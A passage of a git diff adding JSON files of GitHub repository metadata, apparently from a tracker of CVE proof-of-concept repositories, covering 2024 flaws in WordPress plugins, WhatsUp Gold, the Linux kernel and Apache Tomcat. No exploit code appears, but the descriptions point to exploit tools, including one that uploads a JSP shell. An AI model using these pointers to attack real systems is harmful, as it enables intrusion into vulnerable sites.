"forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49681.json b/2024/CVE-2024-49681.json new file mode 100644 index 0000000000..1ef90c9de3 --- /dev/null +++ b/2024/CVE-2024-49681.json @@ -0,0 +1,33 @@ +[ + { + "id": 885857761, + "name": "CVE-2024-49681", + "full_name": "RandomRobbieBF\/CVE-2024-49681", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-49681", + "description": "WP Sessions Time Monitoring Full Automatic <= 1.0.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-09T15:24:16Z", + "updated_at": "2024-11-14T10:40:35Z", + "pushed_at": "2024-11-09T15:25:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5009.json b/2024/CVE-2024-5009.json new file mode 100644 index 0000000000..cfdca7b749 --- /dev/null +++ b/2024/CVE-2024-5009.json @@ -0,0 +1,64 @@ +[ + { + "id": 825745964, + "name": "CVE-2024-5009", + "full_name": "sinsinology\/CVE-2024-5009", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-5009", + "description": "Exploit for CVE-2024-5009", + "fork": false, + "created_at": "2024-07-08T12:15:29Z", + "updated_at": "2024-12-28T12:42:58Z", + "pushed_at": "2024-07-08T12:15:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826412875, + "name": "CVE-2024-5009", + "full_name": "th3gokul\/CVE-2024-5009", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-5009", + "description": "CVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation", + "fork": false, + "created_at": "2024-07-09T16:56:49Z", + "updated_at": "2024-08-07T04:26:04Z", + "pushed_at": "2024-07-09T17:14:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50251.json b/2024/CVE-2024-50251.json new file mode 100644 index 0000000000..241b5c63c9 --- /dev/null +++ b/2024/CVE-2024-50251.json @@ -0,0 +1,33 @@ +[ + { + "id": 887128999, + "name": "CVE-2024-50251-PoC", + "full_name": "slavin-ayu\/CVE-2024-50251-PoC", + "owner": { + "login": "slavin-ayu", + "id": 88360575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88360575?v=4", + "html_url": "https:\/\/github.com\/slavin-ayu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slavin-ayu\/CVE-2024-50251-PoC", + "description": "Just a local Dos bug in Linux kernel", + "fork": false, + "created_at": "2024-11-12T08:08:55Z", + "updated_at": "2024-11-15T07:06:25Z", + "pushed_at": "2024-11-12T08:14:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50335.json b/2024/CVE-2024-50335.json new file mode 100644 index 0000000000..72c30a7f1d --- /dev/null +++ b/2024/CVE-2024-50335.json @@ -0,0 +1,33 @@ +[ + { + "id": 884650375, + "name": "CVE-2024-50335", + "full_name": "shellkraft\/CVE-2024-50335", + "owner": { + "login": "shellkraft", + "id": 89618500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89618500?v=4", + "html_url": "https:\/\/github.com\/shellkraft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellkraft\/CVE-2024-50335", + "description": null, + "fork": false, + "created_at": "2024-11-07T06:19:49Z", + "updated_at": "2024-11-10T11:15:21Z", + "pushed_at": "2024-11-07T06:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50340.json b/2024/CVE-2024-50340.json new file mode 100644 index 0000000000..865b2eae13 --- /dev/null +++ b/2024/CVE-2024-50340.json @@ -0,0 +1,33 @@ +[ + { + "id": 884497011, + "name": "CVE-2024-50340", + "full_name": "Nyamort\/CVE-2024-50340", + "owner": { + "login": "Nyamort", + "id": 67233336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67233336?v=4", + "html_url": "https:\/\/github.com\/Nyamort", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nyamort\/CVE-2024-50340", + "description": null, + "fork": false, + "created_at": "2024-11-06T21:24:43Z", + "updated_at": "2024-11-29T07:45:25Z", + "pushed_at": "2024-11-08T16:39:57Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50379.json b/2024/CVE-2024-50379.json new file mode 100644 index 0000000000..993d988a32 --- /dev/null +++ b/2024/CVE-2024-50379.json @@ -0,0 +1,343 @@ +[ + { + "id": 905424548, + "name": "CVE-2024-50379-POC", + "full_name": "v3153\/CVE-2024-50379-POC", + "owner": { + "login": "v3153", + "id": 93032617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93032617?v=4", + "html_url": "https:\/\/github.com\/v3153", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v3153\/CVE-2024-50379-POC", + "description": null, + "fork": false, + "created_at": "2024-12-18T19:53:46Z", + "updated_at": "2024-12-26T18:33:32Z", + "pushed_at": "2024-12-26T15:22:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905529726, + "name": "CVE-2024-50379-POC", + "full_name": "yiliufeng168\/CVE-2024-50379-POC", + "owner": { + "login": "yiliufeng168", + "id": 61577401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61577401?v=4", + "html_url": "https:\/\/github.com\/yiliufeng168", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yiliufeng168\/CVE-2024-50379-POC", + "description": null, + "fork": false, + "created_at": "2024-12-19T02:43:18Z", + "updated_at": "2024-12-20T06:58:16Z", + "pushed_at": "2024-12-18T20:18:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 906045424, + "name": "Nuclei-Template-CVE-2024-50379", + "full_name": "JFOZ1010\/Nuclei-Template-CVE-2024-50379", + "owner": { + "login": "JFOZ1010", + "id": 82562585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82562585?v=4", + "html_url": "https:\/\/github.com\/JFOZ1010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JFOZ1010\/Nuclei-Template-CVE-2024-50379", + "description": "Repositorio para alojar un template de Nuclei para probar el CVE-2024-50379 (en fase de prueba)", + "fork": false, + "created_at": "2024-12-20T03:43:47Z", + "updated_at": "2024-12-24T05:07:37Z", + "pushed_at": "2024-12-20T03:54:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906070879, + "name": "CVE-2024-50379-PoC", + "full_name": "iSee857\/CVE-2024-50379-PoC", + "owner": { + "login": "iSee857", + "id": 73977770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73977770?v=4", + "html_url": "https:\/\/github.com\/iSee857", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSee857\/CVE-2024-50379-PoC", + "description": "Apache Tomcat(CVE-2024-50379)条件竞争致远程代码执行漏洞批量检测脚本", + "fork": false, + "created_at": "2024-12-20T05:24:10Z", + "updated_at": "2024-12-31T04:22:20Z", + "pushed_at": "2024-12-20T05:41:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 906416890, + "name": "CVE-2024-50379", + "full_name": "Alchemist3dot14\/CVE-2024-50379", + "owner": { + "login": "Alchemist3dot14", + "id": 63059909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4", + "html_url": "https:\/\/github.com\/Alchemist3dot14", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-50379", + "description": "CVE-2024-50379 is a critical vulnerability affecting multiple versions of Apache Tomcat, an open source web server and servlet container widely used for deploying Java-based web applications. The vulnerability arises from a Time-of-Use (TOCTOU) race condition that occurs when compiling JavaServer Pages (JSPs).", + "fork": false, + "created_at": "2024-12-20T21:30:49Z", + "updated_at": "2024-12-23T12:04:31Z", + "pushed_at": "2024-12-20T21:55:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906517672, + "name": "Tomcat-CVE-2024-50379-Poc", + "full_name": "ph0ebus\/Tomcat-CVE-2024-50379-Poc", + "owner": { + "login": "ph0ebus", + "id": 108201283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108201283?v=4", + "html_url": "https:\/\/github.com\/ph0ebus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph0ebus\/Tomcat-CVE-2024-50379-Poc", + "description": "RCE through a race condition in Apache Tomcat", + "fork": false, + "created_at": "2024-12-21T05:54:29Z", + "updated_at": "2025-01-06T16:53:23Z", + "pushed_at": "2024-12-21T08:56:44Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 907257023, + "name": "CVE-2024-50379", + "full_name": "SleepingBag945\/CVE-2024-50379", + "owner": { + "login": "SleepingBag945", + "id": 100852628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100852628?v=4", + "html_url": "https:\/\/github.com\/SleepingBag945", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SleepingBag945\/CVE-2024-50379", + "description": "tomcat CVE-2024-50379\/CVE-2024-56337 条件竞争文件上传exp", + "fork": false, + "created_at": "2024-12-23T07:20:47Z", + "updated_at": "2025-01-06T20:17:42Z", + "pushed_at": "2024-12-23T07:30:27Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 62, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 907408912, + "name": "CVE-2024-50379", + "full_name": "dear-cell\/CVE-2024-50379", + "owner": { + "login": "dear-cell", + "id": 72452338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72452338?v=4", + "html_url": "https:\/\/github.com\/dear-cell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dear-cell\/CVE-2024-50379", + "description": "CVE-2024-50379利用", + "fork": false, + "created_at": "2024-12-23T14:11:46Z", + "updated_at": "2024-12-23T14:13:15Z", + "pushed_at": "2024-12-23T14:13:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 908059795, + "name": "CVE-2024-50379-exp", + "full_name": "lizhianyuguangming\/CVE-2024-50379-exp", + "owner": { + "login": "lizhianyuguangming", + "id": 81677104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81677104?v=4", + "html_url": "https:\/\/github.com\/lizhianyuguangming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lizhianyuguangming\/CVE-2024-50379-exp", + "description": "CVE-2024-50379-exp", + "fork": false, + "created_at": "2024-12-25T02:41:31Z", + "updated_at": "2025-01-07T14:15:12Z", + "pushed_at": "2024-12-31T07:11:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 908327097, + "name": "CVE-2024-50379-POC", + "full_name": "dragonked2\/CVE-2024-50379-POC", + "owner": { + "login": "dragonked2", + "id": 66541902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66541902?v=4", + "html_url": "https:\/\/github.com\/dragonked2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dragonked2\/CVE-2024-50379-POC", + "description": "This repository contains a Python script designed to exploit CVE-2024-50379, a vulnerability that allows attackers to upload a JSP shell to a vulnerable server and execute arbitrary commands remotely. This exploit is particularly useful when the \/uploads directory is either unprotected or not present on the target server.", + "fork": false, + "created_at": "2024-12-25T18:42:29Z", + "updated_at": "2025-01-02T13:30:06Z", + "pushed_at": "2024-12-25T19:01:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 908364457, + "name": "CVE-2024-50379", + "full_name": "bigb0x\/CVE-2024-50379", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-50379", + "description": "Testing the latset Apache Tomcat CVE-2024-50379 Vuln", + "fork": false, + "created_at": "2024-12-25T21:50:16Z", + "updated_at": "2024-12-26T10:31:55Z", + "pushed_at": "2024-12-26T10:31:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50395.json b/2024/CVE-2024-50395.json new file mode 100644 index 0000000000..ddf66493c2 --- /dev/null +++ b/2024/CVE-2024-50395.json @@ -0,0 +1,33 @@ +[ + { + "id": 893743289, + "name": "CVE-2024-50395", + "full_name": "neko-hat\/CVE-2024-50395", + "owner": { + "login": "neko-hat", + "id": 29542700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29542700?v=4", + "html_url": "https:\/\/github.com\/neko-hat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neko-hat\/CVE-2024-50395", + "description": null, + "fork": false, + "created_at": "2024-11-25T06:06:25Z", + "updated_at": "2024-11-25T22:48:49Z", + "pushed_at": "2024-11-25T06:11:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50427.json b/2024/CVE-2024-50427.json new file mode 100644 index 0000000000..3532f8b177 --- /dev/null +++ b/2024/CVE-2024-50427.json @@ -0,0 +1,33 @@ +[ + { + "id": 885351535, + "name": "CVE-2024-50427", + "full_name": "RandomRobbieBF\/CVE-2024-50427", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50427", + "description": "SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-08T12:24:06Z", + "updated_at": "2024-11-08T12:26:15Z", + "pushed_at": "2024-11-08T12:26:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50450.json b/2024/CVE-2024-50450.json new file mode 100644 index 0000000000..4dce11c89f --- /dev/null +++ b/2024/CVE-2024-50450.json @@ -0,0 +1,33 @@ +[ + { + "id": 885327071, + "name": "CVE-2024-50450", + "full_name": "RandomRobbieBF\/CVE-2024-50450", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50450", + "description": "WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Unauthenticated Arbitrary Shortcode Execution", + "fork": false, + "created_at": "2024-11-08T11:24:16Z", + "updated_at": "2024-11-15T13:26:04Z", + "pushed_at": "2024-11-08T11:25:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50473.json b/2024/CVE-2024-50473.json new file mode 100644 index 0000000000..7635dd5611 --- /dev/null +++ b/2024/CVE-2024-50473.json @@ -0,0 +1,33 @@ +[ + { + "id": 885717449, + "name": "CVE-2024-50473", + "full_name": "RandomRobbieBF\/CVE-2024-50473", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50473", + "description": "Ajar in5 Embed <= 3.1.3 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-09T07:46:54Z", + "updated_at": "2024-11-09T07:49:13Z", + "pushed_at": "2024-11-09T07:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50475.json b/2024/CVE-2024-50475.json new file mode 100644 index 0000000000..2e087bc9ef --- /dev/null +++ b/2024/CVE-2024-50475.json @@ -0,0 +1,33 @@ +[ + { + "id": 883081341, + "name": "CVE-2024-50475", + "full_name": "RandomRobbieBF\/CVE-2024-50475", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50475", + "description": "Signup Page <= 1.0 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-04T10:46:46Z", + "updated_at": "2024-11-04T10:51:54Z", + "pushed_at": "2024-11-04T10:51:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50476.json b/2024/CVE-2024-50476.json new file mode 100644 index 0000000000..54dbf744d6 --- /dev/null +++ b/2024/CVE-2024-50476.json @@ -0,0 +1,33 @@ +[ + { + "id": 883044063, + "name": "CVE-2024-50476", + "full_name": "RandomRobbieBF\/CVE-2024-50476", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50476", + "description": "GRÜN spendino Spendenformular <= 1.0.1 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-04T09:30:36Z", + "updated_at": "2024-11-04T09:32:19Z", + "pushed_at": "2024-11-04T09:32:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50477.json b/2024/CVE-2024-50477.json new file mode 100644 index 0000000000..a2916dd72d --- /dev/null +++ b/2024/CVE-2024-50477.json @@ -0,0 +1,33 @@ +[ + { + "id": 885488327, + "name": "CVE-2024-50477", + "full_name": "RandomRobbieBF\/CVE-2024-50477", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50477", + "description": "Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-08T17:22:29Z", + "updated_at": "2024-11-08T17:24:37Z", + "pushed_at": "2024-11-08T17:24:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50478.json b/2024/CVE-2024-50478.json new file mode 100644 index 0000000000..f064a62441 --- /dev/null +++ b/2024/CVE-2024-50478.json @@ -0,0 +1,33 @@ +[ + { + "id": 883959177, + "name": "CVE-2024-50478", + "full_name": "RandomRobbieBF\/CVE-2024-50478", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50478", + "description": "1-Click Login: Passwordless Authentication 1.4.5 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-05T22:04:55Z", + "updated_at": "2024-11-05T22:06:29Z", + "pushed_at": "2024-11-05T22:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50482.json b/2024/CVE-2024-50482.json new file mode 100644 index 0000000000..414cffdb0e --- /dev/null +++ b/2024/CVE-2024-50482.json @@ -0,0 +1,33 @@ +[ + { + "id": 883725552, + "name": "CVE-2024-50482", + "full_name": "RandomRobbieBF\/CVE-2024-50482", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50482", + "description": "Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-05T13:19:05Z", + "updated_at": "2024-11-05T13:21:18Z", + "pushed_at": "2024-11-05T13:21:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50483.json b/2024/CVE-2024-50483.json new file mode 100644 index 0000000000..4330bb40e1 --- /dev/null +++ b/2024/CVE-2024-50483.json @@ -0,0 +1,33 @@ +[ + { + "id": 883950955, + "name": "CVE-2024-50483", + "full_name": "RandomRobbieBF\/CVE-2024-50483", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50483", + "description": "Meetup <= 0.1 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-05T21:38:44Z", + "updated_at": "2024-11-14T10:41:37Z", + "pushed_at": "2024-11-05T21:40:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50485.json b/2024/CVE-2024-50485.json new file mode 100644 index 0000000000..7dac23dd75 --- /dev/null +++ b/2024/CVE-2024-50485.json @@ -0,0 +1,33 @@ +[ + { + "id": 883716846, + "name": "CVE-2024-50485", + "full_name": "RandomRobbieBF\/CVE-2024-50485", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50485", + "description": "Exam Matrix <= 1.5 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2024-11-05T13:02:28Z", + "updated_at": "2024-11-05T13:03:53Z", + "pushed_at": "2024-11-05T13:03:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50488.json b/2024/CVE-2024-50488.json new file mode 100644 index 0000000000..1ca20ef666 --- /dev/null +++ b/2024/CVE-2024-50488.json @@ -0,0 +1,33 @@ +[ + { + "id": 885769222, + "name": "CVE-2024-50488", + "full_name": "RandomRobbieBF\/CVE-2024-50488", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50488", + "description": "Token Login <= 1.0.3 - Authenticated (Subscriber+) Privilege Escalation", + "fork": false, + "created_at": "2024-11-09T10:54:06Z", + "updated_at": "2024-11-09T10:58:33Z", + "pushed_at": "2024-11-09T10:56:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", 